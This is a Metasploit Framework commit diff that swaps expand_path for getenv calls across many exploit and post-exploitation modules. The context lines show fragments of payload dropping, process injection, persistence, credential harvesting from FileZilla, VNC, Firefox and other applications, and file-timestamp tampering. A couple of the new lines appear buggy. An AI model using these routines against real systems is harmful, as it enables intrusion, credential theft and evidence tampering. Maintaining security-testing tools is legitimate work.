Land #2782, fix expand_path abuse

modules/exploits/multi/http/struts_default_action_mapper.rb

@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
       win_file = file.gsub("/", "\\\\")
       if session.type == "meterpreter"
         begin
-          wintemp = session.fs.file.expand_path("%TEMP%")
+          wintemp = session.sys.config.getenv('TEMP')
           win_file = "#{wintemp}\\#{win_file}"
           session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
           session.fs.file.rm(win_file)

modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb

@@ -68,13 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_new_session(session)
     if session.type == "meterpreter"
       session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
-    end
 
       @dropped_files.delete_if do |file|
         win_file = file.gsub("/", "\\\\")
-      if session.type == "meterpreter"
         begin
-          wintemp = session.fs.file.expand_path("%TEMP%")
+          wintemp = session.sys.config.getenv('TEMP')
           win_file = "#{wintemp}\\#{win_file}"
           session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
           session.fs.file.rm(win_file)
@@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
           print_error("Failed to delete #{win_file}")
           false
         end
-
       end
     end
   end

modules/exploits/windows/browser/honeywell_tema_exec.rb

@@ -74,13 +74,11 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_new_session(session)
     if session.type == "meterpreter"
       session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
-    end
 
       @dropped_files.each do |file|
         win_file = file.gsub("/", "\\\\")
-      if session.type == "meterpreter"
         begin
-          wintemp = session.fs.file.expand_path("%WINDIR%")
+          wintemp = session.sys.config.getenv('WINDIR')
           win_file = "#{wintemp}\\Temp\\#{win_file}"
           # Meterpreter should do this automatically as part of
           # fs.file.rm().  Until that has been implemented, remove the
@@ -93,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote
           print_error("Failed to delete #{win_file}")
           false
         end
-
       end
     end
 

modules/exploits/windows/browser/notes_handler_cmdinject.rb

@@ -72,13 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_new_session(session)
     if session.type == "meterpreter"
       session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
-    end
 
       @dropped_files.delete_if do |file|
         win_file = file.gsub("/", "\\\\")
-      if session.type == "meterpreter"
         begin
-          wintemp = session.fs.file.expand_path("%TEMP%")
+          wintemp = session.sys.config.getenv('TEMP')
           win_file = "#{wintemp}\\#{win_file}"
           # Meterpreter should do this automatically as part of
           # fs.file.rm().  Until that has been implemented, remove the
@@ -91,7 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote
           print_error("Failed to delete #{win_file}")
           false
         end
-
       end
     end
 

modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb

@@ -66,13 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_new_session(session)
     if session.type == "meterpreter"
       session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
-    end
 
       @dropped_files.delete_if do |file|
         win_file = file.gsub("/", "\\\\")
-      if session.type == "meterpreter"
         begin
-          wintemp = session.fs.file.expand_path("%TEMP%")
+          wintemp = session.sys.config.getenv('TEMP')
           win_file = "#{wintemp}\\#{win_file}"
           session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
           session.fs.file.rm(win_file)
@@ -82,7 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote
           print_error("Failed to delete #{win_file}")
           false
         end
-
       end
     end
   end

modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb

@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Use the system path for executable to run except the wordpad
     if client.sys.config.sysinfo["OS"] =~ /Windows XP/
-      windir = client.fs.file.expand_path("%ProgramFiles%")
+      windir = client.sys.config.getenv('ProgramFiles')
       cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
     else # Windows 2000
         cmd = "notepad.exe"

modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb

@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
   # Usint this solution atm because I'm experiencing problems with railgun when trying
   # use GetTokenInformation
   def low_integrity_level?
-    tmp_dir = expand_path("%TEMP%")
+    tmp_dir = session.sys.config.getenv('TEMP')
     cd(tmp_dir)
     new_dir = "#{rand_text_alpha(5)}"
     begin

modules/exploits/windows/local/agnitum_outpost_acs.rb

@@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local
     if datastore["WritableDir"] and not datastore["WritableDir"].empty?
       temp_dir = datastore["WritableDir"]
     else
-      temp_dir = expand_path("%TEMP%")
+      temp_dir = client.sys.config.getenv('TEMP')
     end
 
     print_status("Using #{temp_dir} to drop malicious DLL...")

modules/exploits/windows/local/ask.rb

@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Local
     if datastore["PATH"]
       payload_path = datastore["PATH"]
     else
-      payload_path = session.fs.file.expand_path("%TEMP%")
+      payload_path = session.sys.config.getenv('TEMP')
     end
 
     cmd_location = "#{payload_path}\\#{payload_filename}"

modules/exploits/windows/local/bypassuac.rb

@@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Local
 
   end
 
-
   def check_permissions!
     # Check if you are an admin
     vprint_status('Checking admin status...')

modules/exploits/windows/local/current_user_psexec.rb

@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
 
       # Build a random name for the share and directory
       share_name = Rex::Text.rand_text_alphanumeric(8)
-      drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
+      drive = session.sys.config.getenv('SYSTEMDRIVE')
       share_dir = "#{drive}\\#{share_name}"
 
       # Create them

modules/exploits/windows/local/ms10_092_schelevator.rb

@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
     cmd = datastore["CMD"] || nil
     upload_fn = nil
 
-    tempdir = session.fs.file.expand_path("%TEMP%")
+    tempdir = session.sys.config.getenv('TEMP')
     if not cmd
       # Get the exe payload.
       exe = generate_payload_exe
@@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local
     # Create a new task to do our bidding, but make sure it doesn't run.
     #
     taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
-    sysdir = session.fs.file.expand_path("%SystemRoot%")
+    sysdir = session.sys.config.getenv('SystemRoot')
     taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
 
     print_status("Creating task: #{taskname}")

modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb

@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def low_integrity_level?
-    tmp_dir = expand_path("%USERPROFILE%")
+    tmp_dir = session.sys.config.getenv('USERPROFILE')
     cd(tmp_dir)
     new_dir = "#{rand_text_alpha(5)}"
     begin
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local
     if datastore['TECHNIQUE'] == 'FILE'
       payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
       begin
-        tmp_dir = expand_path("%TEMP%")
+        tmp_dir = session.sys.config.getenv('TEMP')
         tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
         cd(tmp_dir)
         print_status("Trying to drop payload to #{tmp_dir}...")
@@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Local
 
       # Spawn low integrity cmd.exe
       print_status("Spawning Low Integrity Cmd Prompt")
-      windir = client.fs.file.expand_path("%windir%")
+      windir = session.sys.config.getenv('windir')
       li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
 
       count = count_cmd_procs

modules/exploits/windows/local/ms_ndproxy.rb

@@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def create_proc
-    windir = expand_path("%windir%")
+    windir = session.sys.config.getenv('windir')
     cmd = "#{windir}\\System32\\notepad.exe"
     # run hidden
     begin

modules/exploits/windows/local/nvidia_nvsvc.rb

@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     print_status("Launching notepad to host the exploit...")
 
-    windir = expand_path("%windir%")
+    windir = session.sys.config.getenv('windir')
     cmd = "#{windir}\\SysWOW64\\notepad.exe"
     process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
     host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)

modules/exploits/windows/local/payload_inject.rb

@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Local
   # Creates a temp notepad.exe to inject payload in to given the payload
   # Returns process PID
   def create_temp_proc()
-    windir = client.fs.file.expand_path("%windir%")
+    windir = client.sys.config.getenv('windir')
     # Select path of executable to run depending the architecture
     if @payload_arch.first== "x86" and client.platform =~ /x86/
       cmd = "#{windir}\\System32\\notepad.exe"

modules/exploits/windows/local/persistence.rb

@@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   # Writes script to target host
   def write_script_to_target(vbs,name)
-    tempdir = expand_path("%TEMP%")
+    tempdir = session.sys.config.getenv('TEMP')
     if name == nil
       tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
     else

modules/exploits/windows/local/ppr_flatten_rec.rb

@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Local
   def check
     os = sysinfo["OS"]
     if os =~ /windows/i
-      file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
+      file_path = session.sys.config.getenv('windir') << "\\system32\\win32k.sys"
       major, minor, build, revision, branch = file_version(file_path)
       vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")
 

modules/exploits/windows/local/s4u_persistence.rb

@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local
   # Returns path for XML and payload
   def generate_path(rexename)
     # Generate a path to write payload and XML
-    path = datastore['PATH'] || expand_path("%TEMP%")
+    path = datastore['PATH'] || session.sys.config.getenv('TEMP')
     xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
     rexe_path = "#{path}\\#{rexename}"
     return xml_path,rexe_path

modules/exploits/windows/local/service_permissions.rb

@@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Local
 
     exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw)
 
-    sysdir = session.fs.file.expand_path("%SystemRoot%")
+    dir_env = session.sys.config.getenvs('SystemRoot', 'TEMP')
-    tmpdir = session.fs.file.expand_path("%TEMP%")
+    sysdir = dir_env['SystemRoot']
+    tmpdir = dir_env['TEMP']
 
     print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..")
     begin
@@ -122,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Local
         moved = false
         configed = false
         #default path, but there should be an ImagePath registry key
-        source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
+        source = "#{sysdir}\\system32\\#{serv}.exe"
         #get path to exe; parse out quotes and arguments
         sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
         sourcemaybe = session.fs.file.expand_path(sourceorig)

modules/exploits/windows/misc/altiris_ds_sqli.rb

@@ -190,7 +190,7 @@ Processor-Speed=#{processor_speed}
       end
     end
 
-    win_temp = client.fs.file.expand_path("%TEMP%")
+    win_temp = client.sys.config.getenv('TEMP')
     win_file = "#{win_temp}\\#{payload_exe}"
     print_status("Attempting to delete #{win_file} ...")
     client.shell_command_token(%Q|attrib.exe -r #{win_file}|)

modules/exploits/windows/novell/file_reporter_fsfui_upload.rb

@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     begin
       print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...")
-      windir = client.fs.file.expand_path("%WINDIR%")
+      windir = client.sys.config.getenv('WINDIR')
       client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs")
       print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...")
       cmd = "#{windir}\\system32\\attrib.exe -r " +

modules/exploits/windows/novell/netiq_pum_eval.rb

@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
       win_file = file.gsub("/", "\\\\")
       if session.type == "meterpreter"
         begin
-          windir = session.fs.file.expand_path("%WINDIR%")
+          windir = session.sys.config.getenv('WINDIR')
           win_file = "#{windir}\\system32\\#{win_file}"
           # Meterpreter should do this automatically as part of
           # fs.file.rm().  Until that has been implemented, remove the

modules/post/linux/manage/download_exec.rb

@@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post
   end
 
   def exists_exe?(exe)
-    path = expand_path("$PATH")
+    path = session.sys.config.getenv("PATH")
     if path.nil? or path.empty?
       return false
     end

modules/post/multi/gather/apple_ios_backup.rb

@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
       paths = enum_users_unix
     when /win/
       @platform = :windows
-      drive = session.fs.file.expand_path("%SystemDrive%")
+      drive = session.sys.config.getenv('SystemDrive')
       os = session.sys.config.sysinfo['OS']
 
       if os =~ /Windows 7|Vista|2008/
@@ -265,7 +265,7 @@ class Metasploit3 < Msf::Post
 
   def whoami
     if @platform == :windows
-      session.fs.file.expand_path("%USERNAME%")
+      session.sys.config.getenv('USERNAME')
     else
       session.shell_command("whoami").chomp
     end

modules/post/multi/gather/env.rb

@@ -54,9 +54,8 @@ class Metasploit3 < Msf::Post
       var_names << registry_enumvals("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment")
       output = []
       var_names.delete(nil)
-      var_names.flatten.uniq.sort.each do |v|
+      session.sys.config.getenvs(*var_names.flatten.uniq.sort).each do |k, v|
-        # Emulate the output of set and env, e.g. VAR=VALUE
+        output << "#{k}=#{v}"
-        output << "#{v}=#{session.fs.file.expand_path("\%#{v}\%")}"
       end
       @output = output.join("\n")
       @ltype = "windows.environment"

modules/post/multi/gather/filezilla_client_cred.rb

@@ -240,7 +240,7 @@ class Metasploit3 < Msf::Post
 
   def whoami
     if @platform == :windows
-      session.fs.file.expand_path("%USERNAME%")
+      session.sys.config.getenv('USERNAME')
     else
       session.shell_command("whoami").chomp
     end

modules/post/multi/gather/firefox_creds.rb

@@ -277,7 +277,6 @@ class Metasploit3 < Msf::Post
   def get_ff_and_loot_path
     @paths = {}
     check_paths = []
-    drive = expand_path("%SystemDrive%")
     loot_file = Rex::Text::rand_text_alpha(6) + ".txt"
 
     case @platform
@@ -286,7 +285,9 @@ class Metasploit3 < Msf::Post
         print_error("You need root privileges on this platform for DECRYPT option")
         return false
       end
-      tmpdir = expand_path("%TEMP%") + "\\"
+      env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive')
+      tmpdir = env_vars['TEMP'] + "\\"
+      drive = env_vars['SystemDrive']
       # this way allows for more independent use of meterpreter
       # payload (32 and 64 bit) and cleaner code
       check_paths << drive + '\\Program Files\\Mozilla Firefox\\'
@@ -643,9 +644,9 @@ class Metasploit3 < Msf::Post
 
   def whoami
     if @platform == :windows
-      return session.fs.file.expand_path("%USERNAME%")
+      session.sys.config.getenv('USERNAME')
     else
-      return session.shell_command("whoami").chomp
+      session.shell_command("whoami").chomp
     end
   end
 end

modules/post/multi/gather/pidgin_cred.rb

@@ -307,7 +307,7 @@ class Metasploit3 < Msf::Post
 
   def whoami
     if @platform == :windows
-      session.fs.file.expand_path("%USERNAME%")
+      session.sys.config.getenv('USERNAME')
     else
       session.shell_command("whoami").chomp
     end

modules/post/multi/gather/thunderbird_creds.rb

@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post
       base = "/Users/#{user}/Library/Thunderbird/Profiles/"
     when /win/
       if session.type =~ /meterpreter/
-        user_profile = session.fs.file.expand_path("%APPDATA%")
+        user_profile = session.sys.config.getenv('APPDATA')
       else
         user_profile = cmd_exec("echo %APPDATA%").strip
       end

modules/post/windows/escalate/ms10_073_kbdlayout.rb

@@ -176,7 +176,7 @@ EOS
     ring0_code.gsub!('TPTP', [pid].pack('V'))
 
     # Create the malicious Keyboard Layout file...
-    tmpdir = session.fs.file.expand_path("%TEMP%")
+    tmpdir = session.sys.config.getenv('TEMP')
     fname = "p0wns.boom"
     dllpath = "#{tmpdir}\\#{fname}"
     fd = session.fs.file.new(dllpath, 'wb')

modules/post/windows/escalate/net_runtime_modify.rb

@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
     paths = []
     services = []
     vuln = ""
-    @temp = session.fs.file.expand_path("%TEMP%")
+    @temp = session.sys.config.getenv('TEMP')
 
     if init_railgun() == :error
       return

modules/post/windows/gather/credentials/bulletproof_ftp.rb

@@ -233,12 +233,14 @@ class Metasploit3 < Msf::Post
 
     print_status("Searching BulletProof FTP Client installation directory...")
     # BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
-    program_files_x86 = expand_path('%ProgramFiles(X86)%')
+    progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
-    if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/
+    progfilesx86 = prog_files_env['ProgramFiles(X86)']
-      program_files = program_files_x86 #x64
+    if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
+      program_files = progfilesx86 # x64
     else
-      program_files = expand_path('%ProgramFiles%') #x86
+      program_files = progfiles_env['ProgramFiles'] # x86
     end
+
     session.fs.dir.foreach(program_files) do |dir|
       if dir =~ /BulletProof FTP Client/
         vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}")

modules/post/windows/gather/credentials/filezilla_server.rb

@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
       return
     end
 
-    drive = session.fs.file.expand_path("%SystemDrive%")
+    drive = session.sys.config.getenv('SystemDrive')
     case session.platform
     when /win64/i
       @progs = drive + '\\Program Files (x86)\\'
@@ -360,6 +360,6 @@ class Metasploit3 < Msf::Post
   end
 
   def whoami
-    return session.fs.file.expand_path("%USERNAME%")
+    return session.sys.config.getenv('USERNAME')
   end
 end

modules/post/windows/gather/credentials/steam.rb

@@ -40,10 +40,12 @@ class Metasploit3 < Msf::Post
     # Steam client is only 32 bit so we need to know what arch we are on so that we can use
     # the correct program files folder.
     # We will just use an x64 only defined env variable to check.
-    if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/
+    progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
-      progs = expand_path('%ProgramFiles(X86)%') #x64
+    progfilesx86 = prog_files_env['ProgramFiles(X86)']
+    if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
+      progs = progfilesx86 # x64
     else
-      progs = expand_path('%ProgramFiles%') #x86
+      progs = progfiles_env['ProgramFiles'] # x86
     end
     path = progs + '\\Steam\\config'
 

modules/post/windows/gather/credentials/tortoisesvn.rb

@@ -103,8 +103,7 @@ class Metasploit3 < Msf::Post
   def get_config_files
     # Determine if TortoiseSVN is installed and parse config files
     savedpwds = 0
-    user_appdata = session.fs.file.expand_path("%APPDATA%")
+    path = session.fs.file.expand_path("%APPDATA%\\Subversion\\auth\\svn.simple\\")
-    path = user_appdata + '\\Subversion\\auth\\svn.simple\\'
     print_status("Checking for configuration files in: #{path}")
 
     begin

modules/post/windows/gather/credentials/total_commander.rb

@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post
   end
 
   def check_systemroot
-    winpath = expand_path("%SYSTEMROOT%")+'\\wcx_ftp.ini'
+    winpath = expand_path("%SYSTEMROOT%\\wcx_ftp.ini")
     check_other(winpath)
   end
 

modules/post/windows/gather/credentials/vnc.rb

@@ -98,11 +98,15 @@ class Metasploit3 < Msf::Post
     locations = []
 
     #Checks
+    progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)')
+    progfiles_env.each do |k, v|
+      next if v.blank?
       locations << {:name => 'UltraVNC',
-      :check_file => session.fs.file.expand_path("%PROGRAMFILES%")+'\\UltraVNC\\ultravnc.ini',
+        :check_file => "#{v}\\UltraVNC\\ultravnc.ini",
         :pass_variable => 'passwd=',
         :viewonly_variable => 'passwd2=',
         :port_variable => 'PortNumber='}
+    end
 
     locations << {:name => 'WinVNC3_HKLM',
       :check_reg => 'HKLM\\Software\\ORL\\WinVNC3',

modules/post/windows/gather/credentials/winscp.rb

@@ -237,7 +237,7 @@ class Metasploit3 < Msf::Post
 
   def run
     print_status("Looking for WinSCP.ini file storage...")
-    get_ini(client.fs.file.expand_path("%PROGRAMFILES%")+'\\WinSCP\\WinSCP.ini')
+    get_ini(client.fs.file.expand_path("%PROGRAMFILES%\\WinSCP\\WinSCP.ini"))
     print_status("Looking for Registry Storage...")
     get_reg()
     print_status("Done!")

modules/post/windows/gather/dumplinks.rb

@@ -53,7 +53,8 @@ class Metasploit3 < Msf::Post
     user = session.sys.config.getuid
     userpath = nil
     useroffcpath = nil
-    sysdrv = session.fs.file.expand_path("%SystemDrive%")
+    env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
+    sysdrv = env_vars['SystemDrive']
     if os =~ /Windows 7|Vista|2008/
       userpath = sysdrv + "\\Users\\"
       lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
@@ -76,7 +77,7 @@ class Metasploit3 < Msf::Post
         userinfo = {}
       end
     else
-      uservar = session.fs.file.expand_path("%USERNAME%")
+      uservar = env_vars['USERNAME']
       userinfo['username'] = uservar
       userinfo['userpath'] = userpath + uservar + lnkpath
       userinfo['useroffcpath'] = userpath + uservar + officelnkpath

modules/post/windows/gather/enum_chrome.rb

@@ -285,7 +285,8 @@ class Metasploit3 < Msf::Post
     host = session.session_host
 
     #Get Google Chrome user data path
-    sysdrive = expand_path("%SYSTEMDRIVE%").strip
+    env_vars = session.sys.config.getenvs('SYSTEMDRIVE', 'USERNAME')
+    sysdrive = env_vars['SYSTEMDRIVE'].strip
     if directory?("#{sysdrive}\\Users")
       @profiles_path = "#{sysdrive}/Users"
       @data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
@@ -310,7 +311,7 @@ class Metasploit3 < Msf::Post
     else
       uid = session.sys.config.getuid
       print_status "Running as user '#{uid}'..."
-      usernames << expand_path("%USERNAME%").strip
+      usernames << env_vars['USERNAME'].strip
     end
 
     has_sqlite3 = true

modules/post/windows/gather/enum_db.rb

@@ -292,7 +292,7 @@ class Metasploit3 < Msf::Post
       return results
     end
 
-    windir = session.fs.file.expand_path("%windir%")
+    windir = session.sys.config.getenv('windir')
     getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
 
     data = nil
@@ -332,7 +332,7 @@ class Metasploit3 < Msf::Post
     elsif exist?(val_location + "\\my.cnf")
       data = read_file(val_location + "\\my.cnf")
     else
-      sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
+      sysdriv=session.sys.config.getenv('SYSTEMDRIVE')
       getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
       getfile.each do |file|
         if exist?("#{file['path']}\\#{file['name']}")

modules/post/windows/gather/enum_files.rb

@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
 
 
   def download_files(location, file_type)
-    sysdriv = client.fs.file.expand_path("%SYSTEMDRIVE%")
+    sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
     sysnfo = client.sys.config.sysinfo['OS']
     profile_path_old = sysdriv + "\\Documents and Settings\\"
     profile_path_new = sysdriv + "\\Users\\"

modules/post/windows/gather/enum_ie.rb

@@ -257,7 +257,7 @@ class Metasploit3 < Msf::Post
     xp_c = "\\Cookies\\index.dat"
     h_paths = []
     c_paths = []
-    base = session.fs.file.expand_path("%USERPROFILE%")
+    base = session.sys.config.getenv('USERPROFILE')
     if host['OS'] =~ /(Windows 7|2008|Vista)/
       h_paths << base + vist_h
       h_paths << base + vist_hlow

modules/post/windows/gather/enum_powershell_env.rb

@@ -28,7 +28,8 @@ class Metasploit3 < Msf::Post
     users = []
     user = session.sys.config.getuid
     path4users = ""
-    sysdrv = session.fs.file.expand_path("%SystemDrive%")
+    env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
+    sysdrv = env_vars['SystemDrive']
 
     if os =~ /Windows 7|Vista|2008/
       path4users = sysdrv + "\\Users\\"
@@ -49,7 +50,7 @@ class Metasploit3 < Msf::Post
       end
     else
       userinfo = {}
-      uservar = session.fs.file.expand_path("%USERNAME%")
+      uservar = env_vars['USERNAME']
       userinfo['username'] = uservar
       userinfo['userappdata'] = path4users + uservar + profilepath
       users << userinfo
@@ -89,7 +90,7 @@ class Metasploit3 < Msf::Post
       end
       if powershell_version =~ /2./
         print_status("Powershell Modules:")
-        powershell_module_path = session.fs.file.expand_path("%PSModulePath%")
+        powershell_module_path = session.sys.config.getenv('PSModulePath')
         session.fs.dir.foreach(powershell_module_path) do |m|
           next if m =~ /^(\.|\.\.)$/
           print_status("\t#{m}")

modules/post/windows/gather/enum_prefetch.rb

@@ -183,7 +183,7 @@ class Metasploit3 < Msf::Post
     print_prefetch_key_value
     print_timezone_key_values(key_value)
     print_good("Current UTC Time: %s" % Time.now.utc)
-    sys_root = expand_path("%SYSTEMROOT%")
+    sys_root = session.sys.config.getenv('SYSTEMROOT')
     full_path = sys_root + "\\Prefetch\\"
     file_type = "*.pf"
     print_status("Gathering information from remote system. This will take awhile..")

modules/post/windows/gather/enum_unattend.rb

@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Post
   # Initialize all 7 possible paths for the answer file
   #
   def init_paths
-    drive = session.fs.file.expand_path("%SystemDrive%")
+    drive = session.sys.config.getenv('SystemDrive')
 
     files =
       [

modules/post/windows/manage/download_exec.rb

@@ -76,16 +76,16 @@ class Metasploit3 < Msf::Post
     url = datastore["URL"]
     filename = datastore["FILENAME"] || url.split('/').last
 
-    download_path = session.fs.file.expand_path(datastore["DOWNLOAD_PATH"])
+    path = datastore['DOWNLOAD_PATH']
-    if download_path.nil? or download_path.empty?
+    if path.blank?
-      path = session.fs.file.expand_path("%TEMP%")
+      path = session.sys.config.getenv('TEMP')
     else
-      path = download_path
+      path = session.fs.file.expand_path(path)
     end
 
     outpath = path + '\\' + filename
     exec = datastore['EXECUTE']
-    exec_string = datastore['EXEC_STRING'] || ''
+    exec_string = datastore['EXEC_STRING']
     output = datastore['OUTPUT']
     remove = datastore['DELETE']
 
@@ -108,11 +108,7 @@ class Metasploit3 < Msf::Post
     # Execute file upon request
     if exec
       begin
-        cmd = "#{outpath} #{exec_string}"
+        cmd = "\"#{outpath}\" #{exec_string}"
-
-        # If we don't have the following gsub, we get this error in Windows:
-        # "Operation failed: The system cannot find the file specified"
-        cmd = cmd.gsub(/\\/, '\\\\\\').gsub(/\s/, '\ ')
 
         print_status("Executing file: #{cmd}")
         res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT'])

modules/post/windows/manage/ie_proxypac.rb

@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Post
   end
 
   def create_pac(local_pac)
-    pac_file = expand_path("%APPDATA%") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
+    pac_file = session.sys.config.getenv("APPDATA") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
     conf_pac = ""
 
     if ::File.exists?(local_pac)

modules/post/windows/manage/payload_inject.rb

@@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post
   # Creates a temp notepad.exe to inject payload in to given the payload
   # Returns process PID
   def create_temp_proc(pay)
-    windir = client.fs.file.expand_path("%windir%")
+    windir = client.sys.config.getenv('windir')
     # Select path of executable to run depending the architecture
     if pay.arch.join == "x86" and client.platform =~ /x86/
       cmd = "#{windir}\\System32\\notepad.exe"

modules/post/windows/manage/rpcapd_start.rb

@@ -46,7 +46,8 @@ class Metasploit3 < Msf::Post
       else
         print_status("Rpcap service found: #{serv['Name']}")
         reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
-        prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
+        # TODO: check if this works on x64
+        prog=session.sys.config.getenv('ProgramFiles') << "\\winpcap\\rpcapd.exe"
         if reg != 2
           print_status("Setting rpcapd as 'auto' service")
           service_change_startup("rpcapd","auto")

modules/post/windows/manage/run_as.rb

@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Post
     end
 
     # set profile paths
-    sysdrive = session.fs.file.expand_path("%SYSTEMDRIVE%")
+    sysdrive = session.sys.config.getenv('SYSTEMDRIVE')
     os = @host_info['OS']
     profiles_path = sysdrive + "\\Documents and Settings\\"
     profiles_path = sysdrive + "\\Users\\" if os =~ /(Windows 7|2008|Vista)/

modules/post/windows/manage/sdel.rb

@@ -57,8 +57,8 @@ class Metasploit3 < Msf::Post
 
   #Function to calculate the size of the cluster
   def size_cluster()
-    drive =  expand_path("%SystemDrive%")
+    drive =  session.sys.config.getenv('SystemDrive')
-    r = client.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
+    r = session.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
     cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"]
     print_status("Cluster Size: #{cluster}")
 
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post
 
   #Function to calculate the real file size on disk (file size + slack space)
   def size_on_disk(file)
-    size_file = client.fs.file.stat(file).size;
+    size_file = session.fs.file.stat(file).size;
     print_status("Size of the file: #{size_file}")
 
     if (size_file<800)
@@ -94,13 +94,13 @@ class Metasploit3 < Msf::Post
     rsec=  Rex::Text.rand_text_numeric(7,bad='012')
     date = Time.now - rsec.to_i
     print_status("Changing MACE attributes")
-    client.priv.fs.set_file_mace(file, date,date,date,date)
+    session.priv.fs.set_file_mace(file, date,date,date,date)
   end
 
